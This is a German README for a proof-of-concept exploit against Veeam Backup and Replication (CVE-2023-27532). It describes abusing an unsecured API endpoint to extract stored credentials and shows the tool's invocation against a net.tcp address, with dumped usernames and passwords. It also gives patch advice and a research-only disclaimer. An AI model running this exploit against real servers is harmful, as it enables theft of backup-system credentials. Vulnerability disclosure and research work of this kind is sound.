
POC für Veeam Backup and Replication CVE-2023-27532
POC für CVE-2023-27532, der Veeam Backup and Replication betrifft
Eine technische Root-Cause-Analyse der Schwachstelle finden Sie in unserem Blog: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive
Dieser POC missbraucht einen ungesicherten API-Endpunkt, um Anmeldedaten zu extrahieren.
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password
UserName = root Password =
UserName = root Password =
UserName = root Password =
UserName = root Password =
Aktualisieren Sie auf die neueste Version oder ergreifen Sie die in der Veeam Advisory beschriebenen Abhilfemaßnahmen.
Diese Software wurde ausschließlich für akademische Forschungszwecke und die Entwicklung effektiver Abwehrtechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, es sei denn, dies wurde ausdrücklich autorisiert. Die Projektverantwortlichen übernehmen keine Verantwortung oder Haftung für Missbrauch der Software. Verwenden Sie sie verantwortungsvoll.